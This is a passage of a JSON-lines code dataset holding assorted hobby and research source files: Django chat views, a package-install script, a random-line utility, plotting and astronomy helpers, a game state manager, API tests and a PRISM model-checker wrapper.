Stop it\")\n dc = 255 / spread # The color delta\n decr = [uint8(255 - int(i * dc)) for i in range(spread)]\n incr = decr[::-1]\n filler = [uint8(0) for i in range(size - 2*len(incr))]\n cdist = decr + filler + incr\n zdist = [uint8(0) for i in range(size)]\n # Build it!\n if colors == 0: # Dumb, what do we do?\n pass\n elif colors == 1:\n\n if red:\n pR = rotate(cdist, 0)\n else:\n pR = zdist\n if green:\n pG = rotate(cdist, 0)\n else:\n pG = zdist\n if blue:\n pB = rotate(cdist, 0)\n else:\n pB = zdist\n elif colors == 2:\n colorseen = 0\n if red:\n pR = rotate(cdist, 0)\n colorseen += 1\n else:\n pR = zdist\n\n if green:\n pG = rotate(cdist, int(colorseen * size / 3))\n colorseen += 1\n else:\n pG = zdist\n\n if blue:\n pB = rotate(cdist, int(colorseen * size / 3))\n else:\n pB = zdist\n\n elif colors == 3:\n pR = rotate(cdist, 0)\n pG = rotate(cdist, size // 3)\n pB = rotate(cdist, -1 * size // 3)\n self.colors = list(zip(pR, pG, pB))\n\n\n def __call__(self, i, damp = 1.0):\n i = i % self.size\n if damp <= 0.0:\n return (0,0,0)\n if damp < 1.0:\n return tuple(map(lambda x : uint8(x*damp), self.colors[i]))\n return self.colors[i]\n\n\n","sub_path":"src/musicvisualizer/utils/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93625597","text":"from django.contrib.auth import get_user_model, authenticate, login, logout\nfrom django.contrib import messages\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom .models import *\nfrom .serializers import *\nfrom .forms import *\n\nclass Home(View):\n template_name = \"index.html\"\n\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated:\n user_initial = request.user.username[0].upper()\n contacts = Contact.objects.all()\n return render(request, self.template_name, locals())\n else:\n return redirect(\"login\")\n\ndef disconnect(request):\n show_hidden = \"hidden\"\n logout(request)\n return redirect(\"login\")\n\n\nclass Connexion(View):\n template_name = \"login.html\"\n next_p = \"home\"\n\n def get(self, request, *args, **kwargs):\n form = ConnexionForm()\n try:\n self.next_p = request.GET[\"next\"]\n except:\n print\n return render(request, self.template_name, locals())\n\n def post(self, request, *args, **kwargs):\n form = ConnexionForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n if user: # Si l'objet renvoyé n'est pas None\n login(request, user)\n messages.success(request, \"You're now connected!\")\n return redirect(self.next_p)\n else:\n messages.error(request, \"logins incorrect!\")\n return render(request, self.template_name, locals())\n\nclass Chat(View):\n template_name = 'chat.html'\n next_p = \"home\"\n\n def get(self, request, id_user, *args, **kwargs):\n form = MessageForm()\n contacts = Contact.objects.all()\n user_initial = request.user.username[0].upper()\n source = request.user\n destination = User.objects.get(id=id_user)\n Message.objects\\\n .filter(Q(source=destination, destination=source))\\\n .update(read=True)\n messages = Message.objects.filter(\n Q(\n Q(source=source, destination=destination) |\n Q(source=destination, destination=source)\n )\n ).order_by(\"timestamp\")\n return render(request, 
self.template_name, locals())\n\n def post(self, request, id_user, *args, **kwargs):\n form = MessageForm(request.POST, request.FILES)\n if form.is_valid():\n message = form.save(commit=False)\n source = request.user\n destination = User.objects.get(id=id_user)\n message.source = source\n message.destination = destination\n message.save()\n messages = Message.objects.filter(\n Q(\n Q(source=source, destination=destination) |\n Q(source=destination, destination=source)\n )\n ).order_by(\"timestamp\")\n return render(request, self.template_name, locals())\n\nclass Register(View):\n template_name = 'register.html'\n next_p = \"home\"\n\n def get(self, request, *args, **kwargs):\n form = RegisterForm()\n try:\n self.next_p = request.GET[\"next\"]\n except:\n print\n return render(request, self.template_name, locals())\n\n def post(self, request, *args, **kwargs):\n form = RegisterForm(request.POST, request.FILES)\n if form.is_valid():\n try:\n username = form.cleaned_data['username']\n firstname = form.cleaned_data['firstname']\n lastname = form.cleaned_data['lastname']\n password = form.cleaned_data['password']\n picture = form.cleaned_data['picture']\n user = User.objects.create_user(\n username=username,\n password=password)\n user.first_name, user.last_name = firstname, lastname\n user.save()\n Contact(user=user, picture=picture).save()\n messages.success(request, \"Hello \"+username+\", youn are registered successfully!\")\n if user:\n login(request, user)\n return redirect(\"home\")\n except Exception as e:\n print(str(e))\n messages.error(request, str(e))\n return render(request, self.template_name, locals())\n\n\n\n","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412153599","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Movies',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Rater',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('gender', models.CharField(choices=[('M', 'Male'), ('F', 'Female')], max_length=1)),\n ('age', models.CharField(choices=[('Under 18', 'Under 18'), ('18-24', '18-24'), ('25-34', '25-34'), ('35-44', '35-44'), ('45-49', '45-49'), ('50-55', '50-55'), ('56+', '56+')], max_length=1)),\n ],\n ),\n migrations.CreateModel(\n name='Ratings',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ],\n ),\n ]\n","sub_path":"movieratings/moviebase/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"325549618","text":"#!/usr/bin/python\n\nfrom os import system\n\n\nf = open('requirements.txt', 'r').readlines()\nfor line in f:\n flag = False\n command = line.split('|')\n cmd = command[0]\n app = command[1]\n\n if cmd == 'ppa':\n prefix = 'yes ENTER | '\n code = 'sudo add-apt-repository '\n elif cmd == 'update':\n prefix = ''\n code = 'sudo apt-get update'\n elif cmd == 'upgrade':\n prefix = ''\n code = 'sudo apt-get upgrade'\n elif cmd == 'pipu':\n prefix = 
''\n code = 'sudo pip install -U '\n elif cmd == 'apt':\n prefix = 'yes | '\n code = 'sudo apt-get install '\n elif cmd == 'remove':\n prefix = 'yes | '\n code = 'sudo apt-get remove '\n elif cmd == 'pip':\n prefix = 'yes | '\n code = 'sudo pip install '\n\n install = prefix + code + app\n system(install)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"124714749","text":"#!/usr/bin/python\n\n\"\"\"\nOutput lines selected randomly from a file\n\nCopyright 2005, 2007 Paul Eggert.\nCopyright 2010 Darrell Benjamin Carbajal.\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nPlease see for a copy of the license.\n\n$Id: randline.py,v 1.4 2010/04/05 20:04:43 eggert Exp $\n\"\"\"\n\nimport random, sys\nfrom optparse import OptionParser\n\nclass randline:\n def __init__(self, filename):\n f = open(filename, 'r')\n self.lines = f.readlines()\n f.close()\n\n def chooseline(self):\n return random.choice(self.lines)\n\ndef main():\n\tversion_msg = \"%prog 2.0\"\n\tusage_msg = \"\"\"%prog [OPTION]... FILE\n\n\tOutput randomly selected lines from FILE.\"\"\"\n\n\tparser = OptionParser(version=version_msg, usage=usage_msg)\n\tparser.add_option(\"-n\", \"--head-count\", action=\"store\", dest=\"COUNT\", default=\"untilEOF\", help=\"output at most COUNT lines\")\n\tparser.add_option(\"-e\", \"--echo\", action=\"store_true\", dest=\"ECHO\", help=\"treat each ARG as an input line\")\n\tparser.add_option(\"-r\", \"--repeat\", action=\"store_true\", dest=\"REPEAT\", help=\"output lines can be repeated\")\n\t \n\toptions, args = parser.parse_args(sys.argv[1:]) \n\n\tif len(args)==0:\n\t\targs.append(sys.stdin.readline().rstrip('\\n'))\n\telif args[0]==\"-\": \n\t\targs[0]=sys.stdin.readline().rstrip('\\n')\n\n\tfor k in range(len(args)):\t\n\t\tinput_file = args[k]\n\t\ttry:\n\t\t\tgenerator = randline(input_file)\n\t\texcept IOError as err:\n\t\t\terrno, strerror = err.args\n\t\t\tprint(\"I/O error({0}): {1}\".format(errno, strerror))\n\n\t\tif options.ECHO==True:\n\t\t\tfor i in range(len(args)):\n\t\t\t\targs[i]=args[i]+\"\\n\"\n\t\t\tgenerator.lines=args\n\n\t\ttry:\n\t\t\tif options.COUNT==\"untilEOF\":\n\t\t\t\tif options.REPEAT==True:\t\t\t\n\t\t\t\t\tnumlines=sys.maxsize\n\t\t\t\telse:\t\n\t\t\t\t\tnumlines=int(len(generator.lines))\n\t\t\telse:\n\t\t\t\tnumlines = int(options.COUNT)\n\t\texcept:\n\t\t\tparser.error(\"invalid NUMLINES: {0}\".\n\t\t\t\t format(options.COUNT))\n\n\t\tif numlines < 0:\n\t\t\tparser.error(\"negative count: {0}\".\n\t\t\t\t format(options.COUNT))\n\t\t \n\t\tlist=[]\n\t\ti=0\n\t\twhile i < numlines:\n\t\t\tfound=False\n\t\t\toutput=generator.chooseline()\n\t\t\tif options.REPEAT==None:\n\t\t\t\tfor j in range(len(list)):\n\t\t\t\t\tif list[j]==output:\n\t\t\t\t\t\tfound=True\n\t\t\t\t\t\tbreak\n\t\t\t\tif found==False:\n\t\t\t\t\tlist.append(output)\n\t\t\t\tif len(generator.lines) <= i:\n\t\t\t\t\tbreak\n\n\t\t\tif found==False:\n\t\t\t\tsys.stdout.write(output)\n\t\t\t\ti += 1\n \n\n\nif __name__ == 
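# The cmd|app parser in setup.py above is fragile: an unrecognised cmd leaves
# prefix/code unbound (NameError), and a line without '|' raises IndexError on
# command[1]. A dict-based sketch of the same command table that sidesteps both
# (illustrative lines, same commands):
COMMANDS = {
    'ppa': ('yes ENTER | ', 'sudo add-apt-repository '),
    'apt': ('yes | ', 'sudo apt-get install '),
    'pip': ('yes | ', 'sudo pip install '),
}

for line in ['apt|git', 'pip|requests', 'bogus|ignored']:
    cmd, _, app = line.strip().partition('|')
    if cmd in COMMANDS:
        prefix, code = COMMANDS[cmd]
        print(prefix + code + app)  # the real script passes this to os.system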
\"__main__\":\n main()\n","sub_path":"Assignment 03/shuf.py","file_name":"shuf.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"603017478","text":"__author__ = 'sainatha798'\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom . import views\napp_name = 'postfeed'\nurlpatterns = [\n url(r'^$', views.index, name='post_home'),\n url(r'^post/$', views.Add_post.as_view(), name='addpost'),\n url(r'^postTag/(?P[0-9]+)/$', views.addPostTag, name='addPostTag'),\n url(r'^chgpref',views.changepref, name='changepref'),\n url(r'^addtag/$', views.n, name='n'),\n url(r'^addtag/(?P[0-9]+)/$', views.addtag, name='addtag'),\n url(r'^edit/$', views.edit, name='edit'),\n url(r'^user/$', views.post, name='user'),\n url(r'^feed/$', views.feed, name= 'feed'),\n\turl(r'^news_feed/$', views.rss, name= 'news_feed'),\n]","sub_path":"iitbhu/postfeed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298420885","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n \ndf = pd.read_csv('../datafile/adjust.txt', header=None, delimiter=' ')\ndf2 = pd.read_csv('../datafile/outsideWhorg.txt', header=None, delimiter='\\n')\n\nlabels = df[0].values\ninfected = df[2].values\nrecover = df2[0].values\nfont={'fontname':'Helvetica','size':10}\nwordfont={'fontname':'Helvetica','size':7}\nx = np.arange(len(labels)) # the label locations\n\nfig, ax = plt.subplots()\n\ndef plotData(plt):\n plt.plot(labels, infected, '-o',label = \"predict\")\n plt.plot(labels, recover,'-o', label = \"real\")\n plt.legend(loc='upper left')\n \nax.set_ylabel('Infected/Recover cases')\nax.set_xlabel('Day',**font)\nax.set_title('Novel CoronaVirus cases Prediction')\nax.set_xticks(x)\nax.set_xticklabels(labels,rotation=90,**wordfont)\n\ndef autolabel(index):\n M =0\n cnt =0\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for i in range (0,index.size):\n height = infected.item(int(i))\n if height>M:\n M=height\n for i in range (0,index.size):\n height = infected.item(int(i))\n cnt =cnt+1\n if height ==M:\n ax.annotate('{}'.format(height),\n xy=(cnt,height),\n xytext=(0, 1), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n \nautolabel(infected)\n#autolabel(recover)\nplotData(plt)\n\nprint('HI')\nplt.show()\n","sub_path":"nCoV_v2/PyPlots/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"653574037","text":"from __future__ import print_function, division\nimport numpy as np\nfrom matplotlib import rc\nfrom PyAstronomy import pyasl\nfrom astropy import constants as const\nfrom astropy import units as u\n'''\nThis function calculates synthetic radial velocity curves using the form:\nRV = gamma + K * (e * cos(w) + cos(theta(t) + w)), Keplarian MarkleyKESolver\n\nTHIS IS A GREAT DOCSTRING BUT IT TRADITIONALLY GOES INSIDE THE FUNCTION :)\n__________________________________________________________________________\n\n Parameters:\n__________________________________________________________________________\nphases : `np.array` Array of phases, typically from 0 to 1\n omega : `int` Argument of periapsis [degrees] ... 
REALLY NOW\n K : `int` Velocity semi-amplitude [km/s]\n ecc : `int` Eccentricity of the system\n gamma : `int` Systemic Velocity [km/s]\n__________________________________________________________________________\n\n Returns:\n__________________________________________________________________________\nKepRVCurve : a 1D array of RVs corresponding to phases\n'''\ndef getkepRV(phases, ecc, omega, gamma, K):\n ks = pyasl.MarkleyKESolver() # Initializes the Keplarian Solver\n #theta = [] # Makes empty list for theta NOT NEEDED\n KepRVCurve = [] # Makes empty list for RV curve data\n\n## Run Keplarian solver MarkleyKESolver() to find the mean anomaly as a function\n## of phase [M_ph], the eccentric anomaly E_ph, and the True anomaly, Tru, or\n## theta, the missing piece of the RV curve calculation\n for phase in phases: # Loop over phases\n MeAn = 2. * np.pi * phase # Solve for mean anomaly, M(phase)\n EcAn = ks.getE(MeAn, ecc) # Solve for eccentric anomaly, E\n\n # Compute the true anomaly\n cosTru = (np.cos(EcAn) - ecc) / (1 - ecc*np.cos(EcAn))\n sinTru = (np.sqrt(1 - ecc**2) * np.sin(EcAn)) / (1 - ecc*np.cos(EcAn))\n Tru = np.arctan2(sinTru, cosTru)\n\n RV = gamma + K * (ecc * np.cos(omega) + np.cos(Tru + omega))\n\n## How exciting, now we've got all the pieces needed to solve for the Keplarian\n## projected RV curve!\n #result = np.add(system,costhetaplusomega) # NO THIS WON'T WORK\n KepRVCurve.append(RV) # add RV curve to the empty list\n\n return KepRVCurve\n\ndef getK(Porb, M1, M2, incl, ecc):\n '''\n Original version by Joni is in comments,\n Slightly condensed edits by Meredith appear as-is\n '''\n# M1_app = M1.to(u.kg) + M2.to(u.kg)\n# P_orb = Porb.to(u.second)\n# twopiG = 2. * cons.pi * cons.G\n# twopiGoverP = np.divide(twopiG, P_orb)\n# part_1 = twopiGoverP**(1/3)\n# M2sin_i = M2.to(u.kg) * np.sin(incl.to(u.deg))\n# M1pow2third = (M1.to(u.kg) + M2.to(u.kg))**(2/3)\n# part_2 = M2sin_i / M1pow2third\n# part_a = part_1 * part_2\n# part_n = np.sqrt(1 - ecc**2)\n# part_3 = 1 / part_n\n# \n# K = np.multiply(part_a, part_3)\n# return(K)\n\n twopiG = 2. * np.pi * const.G\n twopiGoverP = np.divide(twopiG, Porb)\n part_1 = twopiGoverP**(1/3)\n\n M2sin_i = M2 * np.sin(incl)\n M1pow2third = (M1 + M2)**(2/3)\n part_2 = M2sin_i / M1pow2third\n \n part_3 = 1. 
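# Example call of getkepRV as defined above, with illustrative numbers. Note
# that despite the docstring's [degrees], the body applies np.cos/np.sin to
# omega directly, so omega is effectively expected in radians:
import numpy as np

phases = np.linspace(0., 1., 100)
rv = getkepRV(phases, ecc=0.3, omega=np.pi / 4, gamma=-5.0, K=40.0)
print(len(rv), min(rv), max(rv))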
/ np.sqrt(1 - ecc**2)\n\n K = np.multiply(part_1*part_2, part_3)\n \n # ALL IN ONE LINE MWAHAHA -MR\n K1_calc = ((2*np.pi*const.G / Porb)**(1/3)) * ((M2*np.sin(incl)) / (M1+M2)**(2/3)) * (1/np.sqrt(1 - ecc**2))\n\n return K","sub_path":"keplarRV.py","file_name":"keplarRV.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"458767198","text":"# coding: utf-8\n\nfunctions = [\n 'draw', 'update', 'on_start',\n 'on_stop', 'on_pause', 'on_resume'\n]\n\nclass State:\n def __init__(self, ctx):\n self.ctx = ctx\n\n def __str__(self):\n return self.__class__.__name__\n\n def __getattr__(self, name):\n if name in functions:\n return lambda *a, **k: None\n\n raise AttributeError(name)\n\nclass StateManager:\n def __init__(self):\n self.states = []\n\n @property\n def state(self):\n try:\n return self.states[-1]\n except IndexError:\n return None\n\n def pop(self):\n if not self.state:\n raise Exception('state stack is empty')\n\n self.state.on_stop()\n self.states.pop()\n\n if self.state:\n self.state.on_resume()\n\n def set(self, state):\n if not isinstance(state, State):\n raise Exception('`state` must be an instance of `State`')\n\n if self.state:\n self.state.on_stop()\n self.states.pop()\n\n self.states.append(state)\n self.state.on_start()\n\n def push(self, state):\n if not isinstance(state, State):\n raise Exception('`state` must be an instance of `State`')\n\n if self.state:\n self.state.on_pause()\n\n self.states.append(state)\n self.state.on_start()","sub_path":"apeiron/core/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178857238","text":"import sys\nimport argparse\n\ndef parseArgument():\n\t# Parse the input\n\tparser=argparse.ArgumentParser(description=\\\n\t\t\t\"Get the positions with the top scores and their scores\")\n\tparser.add_argument(\"--bedFileNameListFileName\", required=True,\\\n\t\t\thelp='File with list of bed or narrowPeak files')\n\tparser.add_argument(\"--scriptFileName\", required=True,\\\n\t\t\thelp='Output file name for script')\n\toptions = parser.parse_args()\n\treturn options\n\ndef makeIntersectBedAllPairsScript(options):\n\t# Make a script that will run intersectBed for all pairs of files in both directions\n\tbedFileNameListFile = open(options.bedFileNameListFileName)\n\tbedFileNameList = [line.strip() for line in bedFileNameListFile.readlines()]\n\tbedFileNameListFile.close()\n\tscriptFile = open(options.scriptFileName, 'w+')\n\tfor bedFileName in bedFileNameList:\n\t\t# Iterate through the bed files and make a line the script for each paired with every other bed file as well as a line number count line\n\t\tscriptFile.write(\"echo \" + bedFileName + \"\\n\")\n\t\tscriptStringWC = \"{0} {1} {2}\\n\".format(\"zcat\", bedFileName, \"| wc\")\n\t\tscriptFile.write(scriptStringWC)\n\t\tfor otherBedFileName in bedFileNameList:\n\t\t\t# Iterate through the other bed files and make a line for intersecting each with the current bed file\n\t\t\tif bedFileName == otherBedFileName:\n\t\t\t\t# The other bed file is the current bed file, so skip it\n\t\t\t\tcontinue\n\t\t\tscriptStringIntersect = \"{0} {1} {2} {3} {4}\\n\".format(\"intersectBed -wa -a\", bedFileName, \"-b\", otherBedFileName, \"| sort -u -k1,1 -k2,2n -k3,3n | wc\")\n\t\t\tscriptFile.write(scriptStringIntersect)\n\tscriptFile.close()\n\t\nif __name__ == \"__main__\":\n\toptions = 
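# For an input list containing a.bed.gz and b.bed.gz, the script generated by
# makeIntersectBedAllPairsScript above contains one echo/wc pair per file plus
# one intersect line per ordered pair of files:
#
#   echo a.bed.gz
#   zcat a.bed.gz | wc
#   intersectBed -wa -a a.bed.gz -b b.bed.gz | sort -u -k1,1 -k2,2n -k3,3n | wc
#   echo b.bed.gz
#   zcat b.bed.gz | wc
#   intersectBed -wa -a b.bed.gz -b a.bed.gz | sort -u -k1,1 -k2,2n -k3,3n | wc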
parseArgument()\n\tmakeIntersectBedAllPairsScript(options)\n","sub_path":"makeIntersectBedAllPairsScript.py","file_name":"makeIntersectBedAllPairsScript.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222645107","text":"import unittest\nimport datetime as dt\n\nfrom server import config\nfrom server.platforms.twitter_crimson_hexagon import TwitterCrimsonHexagonProvider\n\nTEST_MONITOR_ID = 123456789 # replace with an active live CH Monitor to test effectively\n\n\nclass TwitterCrimsonHexagonProviderTest(unittest.TestCase):\n\n def setUp(self):\n self._provider = TwitterCrimsonHexagonProvider(config.get('CRIMSON_HEXAGON_API_KEY'))\n\n def test_sample(self):\n results = self._provider.sample(None, start_date=dt.datetime(2019, 1, 1), end_date=dt.datetime(2020, 1, 1),\n monitor_id=TEST_MONITOR_ID)\n assert isinstance(results, list) is True\n\n def test_count_over_time(self):\n results = self._provider.count_over_time(None, start_date=dt.datetime(2019, 1, 1),\n end_date=dt.datetime(2020, 1, 1), monitor_id=TEST_MONITOR_ID)\n assert 'counts' in results\n assert isinstance(results['counts'], list) is True\n assert len(results['counts']) > 6\n\n def test_count(self):\n results = self._provider.count(None, start_date=dt.datetime(2019, 1, 1), end_date=dt.datetime(2020, 1, 1),\n monitor_id=TEST_MONITOR_ID)\n assert results['counts'] > 0\n\n def test_words(self):\n results = self._provider.words(None, start_date=dt.datetime(2019, 1, 1), end_date=dt.datetime(2020, 1, 1),\n monitor_id=TEST_MONITOR_ID)\n last_count = 999999999999\n for item in results:\n assert item['count'] > 0\n assert item['count'] <= last_count\n last_count = item['count']\n\n","sub_path":"server/platforms/test/test_twitter_crimson_hexagon.py","file_name":"test_twitter_crimson_hexagon.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"287691149","text":"import glob\nimport os\nimport platform\nimport re\nimport socket\nimport subprocess\nimport sys\nfrom time import time, strftime, localtime\nfrom pathlib import Path\n\nimport psutil\nfrom termcolor import colored\n\nimport configparser\n\nconfig = configparser.ConfigParser()\n# print(os.getcwd())\nworkspace = os.path.dirname(__file__)\n# print(\"workspace\", workspace)\ncwd = os.getcwd()\nos.chdir(workspace)\n\nconfig.read(os.path.join(workspace, \"../config.ini\"))\n# config.sections()\n# prism_path = config.paths['prism_path']\n\nprism_path = config.get(\"mandatory_paths\", \"prism_path\")\nif not os.path.exists(prism_path):\n raise OSError(__file__ + \": Directory does not exist: \" + str(prism_path))\n\nmodel_path = config.get(\"paths\", \"models\")\nif not os.path.exists(model_path):\n raise OSError(__file__ + \": Directory does not exist: \" + str(model_path))\n\nproperties_path = config.get(\"paths\", \"properties\")\nif not os.path.exists(properties_path):\n raise OSError(__file__ + \": Directory does not exist: \" + str(properties_path))\n\nprism_results = config.get(\"paths\", \"prism_results\")\nif not os.path.exists(prism_results):\n os.makedirs(prism_results)\n\nstorm_results = config.get(\"paths\", \"storm_results\")\nif not os.path.exists(storm_results):\n os.makedirs(storm_results)\n\n\nif \"prism\" not in os.environ[\"PATH\"]:\n print(\"prism was probably not in PATH, adding it there\")\n if \"wind\" in platform.system().lower():\n os.environ[\"PATH\"] = 
os.environ[\"PATH\"] + \";\" + prism_path\n else:\n os.environ[\"PATH\"] = os.environ[\"PATH\"] + \":\" + prism_path\n\nfrom load import parse_params_from_model\nfrom common.files import write_to_file\nos.chdir(cwd)\n\n\ndef set_javaheap_win(size):\n \"\"\" Changing the java heap size for the PRISM on Windows\n\n Args:\n size (string): sets maximum memory, see https://www.prismmodelchecker.org/manual/ConfiguringPRISM/OtherOptions\n\n Returns:\n previous value of memory\n \"\"\"\n previous_size = -5\n output = \"\"\n\n with open(os.path.join(str(prism_path), \"prism.bat\"), 'r') as input_file:\n # print(input_file)\n for line in input_file:\n output = output + str(line)\n if line.startswith('java'):\n # print(\"line\", line)\n previous_size = re.findall(r'-Xmx.+[g|G|m|M] -X', line)\n # print(\"previous_size: \", previous_size)\n previous_size = previous_size[0][4:-3]\n # print(\"previous_size: \", previous_size)\n\n a = str(f'-Xmx{str(size)} -X')\n # print(a)\n output = re.sub(r'-Xmx.+[g|G|m|M] -X', a, output)\n # print(\"output: \", output)\n\n with open(os.path.join(str(prism_path), \"prism.bat\"), 'w') as input_file:\n input_file.write(output)\n\n if previous_size == -5:\n print(\"Error occurred while reading the prism.bat file\")\n return\n\n return previous_size\n\n\n## TODO rewrite this without the paths, just files\ndef call_prism(args, seq=False, silent: bool = False, model_path=model_path, properties_path=properties_path,\n prism_output_path=prism_results, std_output_path=prism_results, std_output_file=False):\n \"\"\" Solves problem of calling prism from another directory.\n\n Args:\n args (string): args for executing prism\n seq (bool): if true it will take properties one by one and append the results (helps to deal with memory)\n silent (bool): if silent command line output is set to minimum\n model_path (string): path to load models from\n properties_path (string): path to load properties from\n prism_output_path (string): path to save the files inside the command\n std_output_path (string): path to save the results of the command\n std_output_file (string): file name to save the output\n \"\"\"\n # print(\"prism_results\", prism_results)\n # print(\"std_output_path\", std_output_path)\n # print(\"std_output_file\", std_output_file)\n\n if std_output_path is not None:\n output_file_path = Path(args.split()[0]).stem\n # print(\"output_file_path\", output_file_path)\n if not std_output_file:\n # print(\"if\")\n output_file_path = os.path.join(std_output_path, Path(output_file_path + \".txt\"))\n else:\n # print(\"else\")\n output_file_path = os.path.join(prism_results, Path(str(std_output_file)))\n # print(\"new output_file_path\", output_file_path)\n else:\n output_file_path = \"\"\n\n # print(\"output_file_path\", output_file_path)\n\n # os.chdir(config.get(\"mandatory_paths\",\"cwd\"))\n curr_dir = os.getcwd()\n os.chdir(prism_path)\n # print(os.getcwd())\n prism_args = []\n\n try:\n # print(args.split(\" \"))\n\n args = args.split(\" \")\n # print(args)\n for arg in args:\n # print(arg)\n # print(re.compile('\\.[a-z]').search(arg))\n if re.compile('\\.pm').search(arg) is not None:\n model_file_path = os.path.join(model_path, arg)\n # print(model_file)\n if not os.path.isfile(model_file_path):\n print(f\"{colored('model file', 'red')} {model_file_path} {colored('not found -- skipped', 'red')}\")\n return 404, f\"model file {model_file_path} not found -- skipped\"\n prism_args.append(model_file_path)\n elif re.compile('\\.pctl').search(arg) is not None:\n property_file_path = 
os.path.join(properties_path, arg)\n # print(property_file)\n if not os.path.isfile(property_file_path):\n print(f\"{colored('property file', 'red')} {property_file_path} {colored('not found -- skipped', 'red')}\")\n return 404, f\"property file {property_file_path} not found -- skipped\"\n prism_args.append(property_file_path)\n elif re.compile('\\.txt').search(arg) is not None:\n print(\"prism_output_path\", prism_output_path)\n if not os.path.isabs(prism_output_path):\n prism_output_path = os.path.join(Path(prism_results), Path(prism_output_path))\n\n if not os.path.isdir(prism_output_path):\n if not silent:\n print(f\"{colored('The path', 'red')} {prism_output_path} {colored('not found, this may cause trouble', 'red')}\")\n\n prism_output_file_path = os.path.join(prism_output_path, arg)\n print(\"prism_output_file_path\", prism_output_file_path)\n prism_args.append(prism_output_file_path)\n else:\n prism_args.append(arg)\n # print(prism_args)\n # prism_args.append(\" \".join(args.split(\" \")[-2:]))\n # print(prism_args)\n\n # print(sys.platform)\n if sys.platform.startswith(\"win\"):\n args = [\"prism.bat\"]\n else:\n args = [\"prism\"]\n args.extend(prism_args)\n\n ## forwarding error output to the file\n # args.append(\"2>&1\")\n\n if seq:\n if os.path.isfile(os.path.join(std_output_path, output_file_path)):\n os.remove(os.path.join(std_output_path, output_file_path))\n with open(property_file_path, 'r') as property_file:\n args.append(\"-property\")\n args.append(\"\")\n property_file = property_file.readlines()\n for i in range(1, len(property_file) + 1):\n args[-1] = str(i)\n if not silent:\n print(\"calling \\\"\", \" \".join(args), \"\\\"\")\n output = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n\n ## Check for errors\n if 'OutOfMemoryError' in output:\n if \"-javamaxmem\" not in args:\n memory = round(psutil.virtual_memory()[0] / 1024 / 1024 / 1024) ## total memory converted to GB\n print(colored(f\"A memory error occurred while seq, max memory increased to {memory}GB\", \"red\"))\n args[-2] = \"-javamaxmem\"\n args[-1] = f\"{memory}g\"\n args.append(\"-property\")\n args.append(str(i))\n if sys.platform.startswith(\"win\"):\n previous_memory = set_javaheap_win(f\"{memory}g\")\n if not silent:\n print(\"calling \\\"\", \" \".join(args), \"\\\"\")\n output = subprocess.run(args, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n if 'OutOfMemoryError' in output:\n write_to_file(output_file_path, output, silent, append=True)\n print(colored(f\"A memory error occurred while seq even after increasing the memory, close some programs and try again\", \"red\"))\n if sys.platform.startswith(\"win\"):\n set_javaheap_win(previous_memory)\n return \"memory_fail\", \"A memory error occurred while seq even after increasing the memory, close some programs and try again\"\n else:\n write_to_file(output_file_path, output, silent, append=True)\n print(colored(f\"A memory error occurred while seq with given amount of memory\", \"red\"))\n ## Changing the memory setting back\n if sys.platform.startswith(\"win\"):\n set_javaheap_win(previous_memory)\n return \"memory\", \"A memory error occurred while seq with given amount of memory\"\n\n write_to_file(output_file_path, 